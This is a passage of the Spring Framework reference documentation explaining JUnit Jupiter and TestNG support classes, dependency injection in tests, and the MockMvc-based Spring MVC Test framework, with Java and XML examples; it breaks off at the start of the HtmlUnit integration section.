By annotating test classes with\n`@ExtendWith(SpringExtension.class)`, developers can implement standard JUnit Jupiter\nbased unit and integration tests and simultaneously reap the benefits of the TestContext\nframework such as support for loading application contexts, dependency injection of test\ninstances, transactional test method execution, and so on.\n\nFurthermore, thanks to the rich extension API in JUnit Jupiter, Spring is able to provide\nthe following features above and beyond the feature set that Spring supports for JUnit 4\nand TestNG.\n\n* Dependency injection for test constructors, test methods, and test lifecycle callback\n methods\n - See <<testcontext-junit-jupiter-di>> for further details.\n* Powerful support for link:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-conditions[_conditional test execution_]\n based on SpEL expressions, environment variables, system properties, etc.\n - See the documentation for `@EnabledIf` and `@DisabledIf` in\n <<integration-testing-annotations-junit-jupiter>> for further details and examples.\n* Custom _composed annotations_ that combine annotations from Spring **and** JUnit\n Jupiter.\n - See the `@TransactionalDevTestConfig` and `@TransactionalIntegrationTest` examples in\n <<integration-testing-annotations-meta>> for further details.\n\nThe following code listing demonstrates how to configure a test class to use the\n`SpringExtension` in conjunction with `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs JUnit Jupiter to extend the test with Spring support.\n@ExtendWith(SpringExtension.class)\n\/\/ Instructs Spring to load an ApplicationContext from TestConfig.class\n@ContextConfiguration(classes = TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSince annotations in JUnit 5 can also be used as meta-annotations, Spring is able to\nprovide `@SpringJUnitConfig` and `@SpringJUnitWebConfig` __composed annotations__ to\nsimplify the configuration of the test `ApplicationContext` and JUnit Jupiter.\n\nFor example, the following example uses `@SpringJUnitConfig` to reduce the amount of\nconfiguration used in the previous example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load an ApplicationContext from TestConfig.class\n@SpringJUnitConfig(TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSimilarly, the following example uses `@SpringJUnitWebConfig` to create a\n`WebApplicationContext` for use with JUnit Jupiter.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load a WebApplicationContext from TestWebConfig.class\n@SpringJUnitWebConfig(TestWebConfig.class)\nclass SimpleWebTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSee the documentation for `@SpringJUnitConfig` and `@SpringJUnitWebConfig` in\n<<integration-testing-annotations-junit-jupiter>> for further details.\n\n\n[[testcontext-junit-jupiter-di]]\n===== Dependency Injection with the SpringExtension\n\nThe `SpringExtension` implements the\nlink:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-parameter-resolution[`ParameterResolver`]\nextension API from JUnit Jupiter which allows Spring to provide dependency injection for\ntest 
constructors, test methods, and test lifecycle callback methods.

Specifically, the `SpringExtension` is able to inject dependencies from the test's
`ApplicationContext` into test constructors and methods annotated with `@BeforeAll`,
`@AfterAll`, `@BeforeEach`, `@AfterEach`, `@Test`, `@RepeatedTest`, `@ParameterizedTest`,
etc.

[[testcontext-junit-jupiter-di-constructor]]
====== Constructor Injection

If a parameter in a constructor for a JUnit Jupiter test class is of type
`ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with
`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific
parameter with the corresponding bean from the test's `ApplicationContext`. A test
constructor can also be directly annotated with `@Autowired` if all of the parameters
should be supplied by Spring.

[WARNING]
====
If the constructor for a test class is itself annotated with `@Autowired`, Spring will
assume the responsibility for resolving **all** parameters in the constructor.
Consequently, no other `ParameterResolver` registered with JUnit Jupiter will be able to
resolve parameters for such a constructor.
====

In the following example, Spring will inject the `OrderService` bean from the
`ApplicationContext` loaded from `TestConfig.class` into the
`OrderServiceIntegrationTests` constructor. Note as well that this feature allows test
dependencies to be `final` and therefore _immutable_.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@SpringJUnitConfig(TestConfig.class)
	class OrderServiceIntegrationTests {

		private final OrderService orderService;

		@Autowired
		OrderServiceIntegrationTests(OrderService orderService) {
			this.orderService = orderService;
		}

		// tests that use the injected OrderService
	}
----

[[testcontext-junit-jupiter-di-method]]
====== Method Injection

If a parameter in a JUnit Jupiter test method or test lifecycle callback method is of
type `ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with
`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific
parameter with the corresponding bean from the test's `ApplicationContext`.

In the following example, Spring will inject the `OrderService` from the
`ApplicationContext` loaded from `TestConfig.class` into the `deleteOrder()` test method.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@SpringJUnitConfig(TestConfig.class)
	class OrderServiceIntegrationTests {

		@Test
		void deleteOrder(@Autowired OrderService orderService) {
			// use orderService from the test's ApplicationContext
		}
	}
----

Due to the robustness of the `ParameterResolver` support in JUnit Jupiter, it is also
possible to have multiple dependencies injected into a single method not only from Spring
but also from JUnit Jupiter itself or other third-party extensions.

The following example demonstrates how to have both Spring and JUnit Jupiter inject
dependencies into the `placeOrderRepeatedly()` test method simultaneously.
Note that the\nuse of `@RepeatedTest` from JUnit Jupiter allows the test method to gain access to the\n`RepetitionInfo`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @RepeatedTest(10)\n void placeOrderRepeatedly(RepetitionInfo repetitionInfo,\n @Autowired OrderService orderService) {\n\n \/\/ use orderService from the test's ApplicationContext\n \/\/ and repetitionInfo from JUnit Jupiter\n }\n}\n----\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. 
It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit Jupiter based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\nimport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\nimport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n@SpringJUnitWebConfig(locations = \"test-servlet-context.xml\")\nclass ExampleTests {\n\n private MockMvc mockMvc;\n\n @BeforeEach\n void setup(WebApplicationContext wac) {\n this.mockMvc = MockMvcBuilders.webAppContextSetup(wac).build();\n }\n\n @Test\n void getAccount() throws Exception {\n this.mockMvc.perform(get(\"\/accounts\/1\")\n .accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n .andExpect(status().isOk())\n .andExpect(content().contentType(\"application\/json\"))\n .andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n }\n\n}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. 
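As a sketch of the Java-based variant, the same test could point `@SpringJUnitWebConfig`
at a `@Configuration` class instead of an XML file; `WebConfig` below is a hypothetical
configuration class, not part of the example above.

[source,java,indent=0]
----
	// WebConfig is an assumed @Configuration/@EnableWebMvc class
	@SpringJUnitWebConfig(WebConfig.class)
	class JavaConfigExampleTests {

		private MockMvc mockMvc;

		@BeforeEach
		void setup(WebApplicationContext wac) {
			this.mockMvc = MockMvcBuilders.webAppContextSetup(wac).build();
		}

		// same request-performing tests as above...
	}
----
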
See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Choices\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. 
Here is an
example of declaring a mock service with Mockito:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="org.mockito.Mockito" factory-method="mock">
		<constructor-arg value="org.example.AccountService"/>
	</bean>
----

You can then inject the mock service into the test in order to set up and verify
expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("test-servlet-context.xml")
	public class AccountTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Autowired
		private AccountService accountService;

		// ...

	}
----

The __"standaloneSetup"__ on the other hand is a little closer to a unit test. It tests
one controller at a time: the controller can be injected with mock dependencies manually,
and it doesn't involve loading Spring configuration. Such tests are more focused in style
and make it easier to see which controller is being tested, whether any specific Spring
MVC configuration is required for it to work, and so on. The "standaloneSetup" is also a
very convenient way to write ad-hoc tests to verify specific behavior or to debug an
issue.

Just like with any "integration vs. unit testing" debate, there is no right or wrong
answer. However, using the "standaloneSetup" does imply the need for additional
"webAppContextSetup" tests in order to verify your Spring MVC configuration.
Alternatively, you may choose to write all tests with "webAppContextSetup" in order to
always test against your actual Spring MVC configuration.

[[spring-mvc-test-server-setup-steps]]
===== Setup Features

No matter which MockMvc builder you use, all `MockMvcBuilder` implementations provide
some common and very useful features. For example, you can declare an `Accept` header
for all requests and expect a status of 200 as well as a `Content-Type` header
in all responses as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// static import of MockMvcBuilders.standaloneSetup

MockMvc mockMvc = standaloneSetup(new MusicController())
		.defaultRequest(get("/").accept(MediaType.APPLICATION_JSON))
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build();
----

In addition, third-party frameworks (and applications) may pre-package setup
instructions like the ones above through a `MockMvcConfigurer`.
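A minimal sketch of such a configurer, assuming we want every request built by a given
`MockMvc` instance to carry a JSON `Accept` header (the `JsonDefaultsConfigurer` class
name is illustrative, not a Spring API):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
class JsonDefaultsConfigurer implements MockMvcConfigurer {

	@Override
	public void afterConfigurerAdded(ConfigurableMockMvcBuilder<?> builder) {
		// pre-packaged setup: applied when the configurer is added to a builder
		builder.defaultRequest(get("/").accept(MediaType.APPLICATION_JSON));
	}
}

// Usage:
MockMvc mockMvc = standaloneSetup(new MusicController())
		.apply(new JsonDefaultsConfigurer())
		.build();
----
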
The Spring Framework has one such built-in implementation that helps to save and re-use
the HTTP session across requests. It can be used as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// static import of SharedHttpSessionConfigurer.sharedHttpSession

MockMvc mockMvc = MockMvcBuilders.standaloneSetup(new TestController())
		.apply(sharedHttpSession())
		.build();

// Use mockMvc to perform requests...
----

See `ConfigurableMockMvcBuilder` for a list of all MockMvc builder features
or use the IDE to explore the available options.


[[spring-mvc-test-server-performing-requests]]
===== Performing Requests
It's easy to perform requests using any HTTP method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/hotels/{id}", 42).accept(MediaType.APPLICATION_JSON));
----

You can also perform file upload requests that internally use
`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart
request; rather, you have to set it up:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(multipart("/doc").file("a1", "ABC".getBytes("UTF-8")));
----

You can specify query parameters in URI template style:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels?foo={foo}", "bar"));
----

Or you can add Servlet request parameters representing either query or form parameters:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels").param("foo", "bar"));
----

If application code relies on Servlet request parameters and doesn't check the query
string explicitly (as is most often the case), then it doesn't matter which option you
use. Keep in mind, however, that query params provided with the URI template will be
decoded, while request parameters provided through the `param(...)` method are expected
to already be decoded.

In most cases it's preferable to leave out the context path and the Servlet path from
the request URI. If you must test with the full request URI, be sure to set the
`contextPath` and `servletPath` accordingly so that request mappings will work:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/app/main/hotels/{id}").contextPath("/app").servletPath("/main"))
----

Looking at the above example, it would be cumbersome to set the contextPath and
servletPath with every performed request.
Instead, you can set up default request
properties:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyWebTests {

		private MockMvc mockMvc;

		@Before
		public void setup() {
			mockMvc = standaloneSetup(new AccountController())
				.defaultRequest(get("/")
					.contextPath("/app").servletPath("/main")
					.accept(MediaType.APPLICATION_JSON))
				.build();
		}

		// ...

	}
----

The above properties will affect every request performed through the `MockMvc` instance.
If the same property is also specified on a given request, it overrides the default value.
That is why the HTTP method and URI in the default request don't matter, since they must
be specified on every request.

[[spring-mvc-test-server-defining-expectations]]
===== Defining Expectations
Expectations can be defined by appending one or more `.andExpect(..)` calls after
performing a request:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/accounts/1")).andExpect(status().isOk());
----

`MockMvcResultMatchers.*` provides a number of expectations, some of which are further
nested with more detailed expectations.

Expectations fall in two general categories. The first category of assertions verifies
properties of the response: for example, the response status, headers, and content. These
are the most important results to assert.

The second category of assertions goes beyond the response. These assertions allow
one to inspect Spring MVC specific aspects such as which controller method processed
the request, whether an exception was raised and handled, what the content of the model
is, what view was selected, what flash attributes were added, and so on. They also allow
one to inspect Servlet specific aspects such as request and session attributes.

The following test asserts that binding or validation failed:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

Many times when writing tests, it's useful to _dump_ the results of the performed request.
This can be done as follows, where `print()` is a static import from
`MockMvcResultHandlers`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andDo(print())
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

As long as request processing does not cause an unhandled exception, the `print()` method
will print all the available result data to `System.out`. Spring Framework 4.2 introduced
a `log()` method and two additional variants of the `print()` method, one that accepts
an `OutputStream` and one that accepts a `Writer`. For example, invoking
`print(System.err)` will print the result data to `System.err`; while invoking
`print(myWriter)` will print the result data to a custom writer. If you would like to
have the result data _logged_ instead of printed, simply invoke the `log()` method which
will log the result data as a single `DEBUG` message under the
`org.springframework.test.web.servlet.result` logging category.
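As a quick sketch of those variants, assuming static imports of `print` and `log` from
`MockMvcResultHandlers`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andDo(print(System.err))	// print the result data to System.err
		.andDo(log())				// log the result data as a single DEBUG message
		.andExpect(status().isOk());
----
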
In some cases, you may want to get direct access to the result and verify something that
cannot be verified otherwise. This can be achieved by appending `.andReturn()` after all
other expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	MvcResult mvcResult = mockMvc.perform(post("/persons")).andExpect(status().isOk()).andReturn();
	// ...
----

If all tests repeat the same expectations, you can set up common expectations once
when building the `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	standaloneSetup(new SimpleController())
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build()
----

Note that common expectations are __always__ applied and cannot be overridden without
creating a separate `MockMvc` instance.

When JSON response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using JsonPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/people").accept(MediaType.APPLICATION_JSON))
		.andExpect(jsonPath("$.links[?(@.rel == 'self')].href").value("http://localhost:8080/people"));
----

When XML response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using XPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Map<String, String> ns = Collections.singletonMap("ns", "http://www.w3.org/2005/Atom");
	mockMvc.perform(get("/handle").accept(MediaType.APPLICATION_XML))
		.andExpect(xpath("/person/ns:link[@rel='self']/@href", ns).string("http://localhost:8080/people"));
----

[[spring-mvc-test-server-filters]]
===== Filter Registrations
When setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();
----

Registered filters will be invoked through the `MockFilterChain` from `spring-test`, and the
last filter will delegate to the `DispatcherServlet`.

[[spring-mvc-test-vs-end-to-end-integration-tests]]
===== Differences between Out-of-Container and End-to-End Integration Tests

As mentioned earlier, __Spring MVC Test__ is built on the Servlet API mock objects from
the `spring-test` module and does not use a running Servlet container. Therefore
there are some important differences compared to full end-to-end integration tests
with an actual client and server running.

The easiest way to think about this is starting with a blank `MockHttpServletRequest`.
Whatever you add to it is what the request will be. Things that may catch you by surprise
are that there is no context path by default, no `jsessionid` cookie, no forwarding, error,
or async dispatches, and therefore no actual JSP rendering. Instead, "forwarded" and
"redirected" URLs are saved in the `MockHttpServletResponse` and can be asserted with
expectations.

This means that if you are using JSPs, you can verify the JSP page to which the request
was forwarded, but there won't be any HTML rendered. In other words, the JSP will not be
_invoked_. Note, however, that all other rendering technologies which don't rely on
forwarding, such as Thymeleaf and FreeMarker, will render HTML to the response body as
expected.
The same is true for rendering JSON, XML, and other formats via `@ResponseBody`\nmethods.\n\nAlternatively you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server-side so you can check what handler was used,\nif an exception was handled with a HandlerExceptionResolver, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing, that it's\neasier to write, reason about, and debug but does not replace the need for full\nintegration tests. At the same time it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. 
This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], &\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, FreeMarker, etc.), but it does not work with JSPs since they rely on the Servlet\ncontainer.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of synch with the controller. 
To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration 